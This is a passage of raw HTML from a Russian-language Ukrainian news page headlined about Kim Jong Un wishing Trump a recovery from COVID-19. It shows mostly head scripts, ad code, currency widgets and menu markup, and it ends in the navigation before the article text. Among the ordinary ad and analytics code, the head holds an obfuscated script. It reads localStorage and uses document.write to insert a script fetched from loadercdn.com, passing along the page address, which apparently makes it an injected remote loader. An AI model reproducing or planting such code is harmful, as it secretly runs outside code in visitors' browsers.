<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Ким Чен Ын пожелал Дональду Трампу поскорее выздороветь от COVID-19 | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Ким Чен Ын пожелал Дональду Трампу поскорее выздороветь от COVID-19 "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2020/10/755512709388191-640x396.jpeg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="640" /><meta property="og:image:height" content="396" /><meta property="og:image:alt" content="Ким Чен Ын пожелал Дональду Трампу поскорее выздороветь от COVID-19 " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='videojscss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/video-js.css' type='text/css' media='all' /><link rel='stylesheet' id='videojsimacss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><link rel='stylesheet' id='ldc-like-dislike-css' href='https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="У Дональда Трампа и Мелании был диагностирован коронавирус рано утром в пятницу." /><meta property="og:description" content="У Дональда Трампа и Мелании был диагностирован коронавирус рано утром в пятницу." /><meta name="keywords" content="covid-19,коронавирус,трамп,здоровье" /><link rel="canonical" href="https://enovosty.com/zdorove/full/510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19" /><meta property="og:url" content="https://enovosty.com/zdorove/full/510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19" /><style>.ms-parent-id-5 > .master-slider{background:#000000}.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><link rel="amphtml" href="https://enovosty.com/zdorove/full/510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4820262';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4820262&amp;a=164" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
data-inv="//ads.go2net.com.ua/"
data-r="single"
data-sender="go2net"
data-bundle="desktop"></script><meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script> !(function () { window.googletag = window.googletag || {}; window.vmpbjs = window.vmpbjs || {}; window.vpb = window.vpb || {}; vpb.fastLoad = true; googletag.cmd = googletag.cmd || []; vmpbjs.cmd = vmpbjs.cmd || []; var cmds = googletag.cmd.slice(0) || []; googletag.cmd.length=0; var ready = false; function exec(cb) { return cb.call(googletag); } googletag.cmd.push(function () { googletag.cmd.unshift = function (cb) { if (ready) { return exec(cb); } cmds.unshift(cb); if (cb._startgpt) { ready = true; cmds.forEach(cb=> { exec(cb); }); } }; googletag.cmd.push = function (cb) { if (ready) { return exec(cb); } cmds.push(cb); }; }); googletag.cmd.push = function (cb) { cmds.push(cb) }; googletag.cmd.unshift = function (cb) { cmds.unshift(cb); if (cb._startgpt) { ready = true; if (googletag.apiReady) { cmds.forEach(function (cb) { googletag.cmd.push(cb); }) } else { googletag.cmd = cmds; } } }; var dayMs = 36e5, cb = parseInt(Date.now() / dayMs), vpbSrc = '//player.adtelligent.com/prebidlink/' + cb + '/wrapper_hb_308225_6946.js', pbSrc = vpbSrc.replace('wrapper_hb', 'hb'), gptSrc = '//securepubads.g.doubleclick.net/tag/js/gpt.js', c = document.head || document.body || document.documentElement; function loadScript(src, cb) { var s = document.createElement('script'); s.src = src; s.defer=false; c.appendChild(s); s.onload = cb; s.onerror = function(){ var fn = function(){}; fn._startgpt = true; googletag.cmd.unshift(fn); }; return s; } loadScript(pbSrc); loadScript(gptSrc); loadScript(vpbSrc); })() </script><script async src="//www.googletagservices.com/tag/js/gpt.js"></script><script async src="//acdn.adnxs.com/prebid/not-for-prod/prebid.js"></script><script>var div_1_sizes = [
[240, 320],[240, 350],[240, 420],[240, 500],[240, 600],[300, 250],[300, 280],[300, 300],[300, 400],[300, 500],[300, 600],[320, 50],[320, 100],[320, 250],[320, 480],[320, 600]
];var div_2_sizes = [
[200, 200],[200, 400],[200, 600],[240, 350],[240, 500],[240, 600],[300, 250],[300, 300],[300, 400],[300, 500],[300, 600]
];var div_3_sizes = [
[240, 350],[240, 500],[300, 250],[300, 600]
];var div_4_sizes = [
[300, 250],[300, 50],[300, 75],[300, 100],[300, 300],[320, 50],[320, 100],[320, 250],[320, 200]
];var PREBID_TIMEOUT = 1000;var FAILSAFE_TIMEOUT = 3000;var adUnits = [
{code: '/29636627/enovosty.com_300x600_mob_hb',mediaTypes: {banner: {sizes: div_1_sizes
}},bids: [{bidder: 'admixer',params: {zone: '0aeef458-3e2c-4ffa-b559-7ed3aa2de424'
}}]
},{code: '/29636627/enovosty.com_320x250_hb',mediaTypes: {banner: {sizes: div_4_sizes
}},bids: [{bidder: 'admixer',params: {zone: '156e0022-5c98-499e-b4e6-788848e60a3c'
}}]
},{code: '/29636627/enovosty.com_300x600_top_hb',mediaTypes: {banner: {sizes: div_2_sizes
}},bids: [{bidder: 'admixer',params: {zone: '9743148c-0bcf-416e-8ab5-55d24689e145'
}}]
},{code: '/29636627/enovosty.com_300x600_ukr.net_hb',mediaTypes: {banner: {sizes: div_3_sizes
}},bids: [{bidder: 'admixer',params: {zone: '7af953ae-795d-4e3e-8b55-c1906dcae224'
}}]
}];// ======== DO NOT EDIT BELOW THIS LINE =========== //
var googletag = googletag || {};googletag.cmd = googletag.cmd || [];googletag.cmd.push(function() {googletag.pubads().disableInitialLoad();});var pbjs = pbjs || {};pbjs.que = pbjs.que || [];pbjs.que.push(function() {pbjs.addAdUnits(adUnits);pbjs.requestBids({bidsBackHandler: initAdserver,timeout: PREBID_TIMEOUT
});});function initAdserver() {if (pbjs.initAdserverSet) return;pbjs.initAdserverSet = true;googletag.cmd.push(function() {pbjs.que.push(function() {pbjs.setTargetingForGPTAsync();googletag.pubads().refresh();});});}// in case PBJS doesn't load
setTimeout(function() {initAdserver();}, FAILSAFE_TIMEOUT);googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_mob_hb', div_1_sizes, 'div-1').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_top_hb', div_2_sizes, 'div-2').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_ukr.net_hb', div_3_sizes, 'div-3').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_320x250_hb', div_4_sizes, 'div-4').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});</script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/59256651/Test_Moxtv_enovosty_970x250', [970, 250], 'div-gpt-ad-1599639337661-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty2_300x600', [300, 600], 'div-gpt-ad-1596728019577-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_970x250', [970, 250], 'div-gpt-ad-1595961600637-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_adint_300_600', [[300, 600],[300,250]], 'div-gpt-ad-1594112815543-0').addService(googletag.pubads());googletag.defineSlot('/59256651/Adaptive_zone', [470, 376], 'div-gpt-ad-1594991505318-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.pubads().collapseEmptyDivs();googletag.enableServices();});
</script><script type="text/plain" id="vpb-catfish-template"><div class="vpb-catfish-container" style="position: fixed;bottom:0;left:0;right:0;z-index:999999;"><div class="vpb-ad" style="display: block;position: relative;margin:0px auto;"><span class="vpb-close-button"
style="display: none;position: absolute;top:-15px;right:-15px;z-index:9999;cursor: pointer;"><img src="data:image/png;base64,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"/></span></div></div></script><script>function catfish(div) {var gt = window.googletag || {};gt.cmd = gt.cmd || [];gt.cmd.push(function () {var template = document.getElementById('vpb-catfish-template').innerHTML;var adContainer = document.getElementById(div);adContainer.innerHTML = template;adContainer.id = 'vpb-ad-wrapped-generated-' + (Math.random() + Date.now());var innerWrapper = adContainer.getElementsByClassName('vpb-ad')[0];var closeBtn = adContainer.getElementsByClassName('vpb-close-button')[0];var newAdDiv = document.createElement('div');newAdDiv.id = div;innerWrapper.appendChild(newAdDiv);googletag.pubads().addEventListener('slotRenderEnded', function (event) {var slot = event.slot;var slotId = slot.getSlotElementId();if (slotId != div)  return;if (event.isEmpty) {closeBtn.style.display = 'none';adContainer.style.display = 'none';return;}adContainer.style.display = 'block';innerWrapper.style.width = event.size[0] + 'px';innerWrapper.style.height = event.size[1] + 'px';closeBtn.style.display = 'inline-block';closeBtn.addEventListener('click', function () {adContainer.parentElement.removeChild(adContainer);})
});gt.display(div);})
}</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});globalAml.singleRequest("go2net");});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: 'f1971219-dfb6-45c1-a362-6879325bc045', ph: 'admixer_f1971219dfb645c1a3626879325bc045_zone_45971_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9', sender: 'admixer'});globalAml.singleRequest("admixer");});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/zdorove-ukr/full/510-kim-chen-in-pobazhav-donaldu-trampu-skorishe-viduzhati-vid-covid-19">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/zdorove/full/510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/zdorove/full/510-kim-chen-yn-pozhelal-donaldu-trampu-poskoree-vyzdorovet-ot-covid-19?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" />Мобильная версия</a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>28.50</td><td>28.19</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>33.50</td><td>32.77</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.38</td><td>0.31</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>500.22</td><td>0.00</td><td>16:16 02.10.2020</td> </tr> <tr class="tr_white"> <td>UX</td><td>1335.37</td><td>0.36</td><td>16:35 05.10.2020</td> </tr> <tr> <td>RTS</td><td>1151.30</td><td>0.28</td><td>16:36 05.10.2020</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>41.02</td><td>+4.46</td><td style="text-transform:uppercase;">Oct</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>38.91</td><td>+5.02</td><td style="text-transform:uppercase;">Oct</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>329.50</td><td>+3.37</td><td style="text-transform:uppercase;">Oct</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a 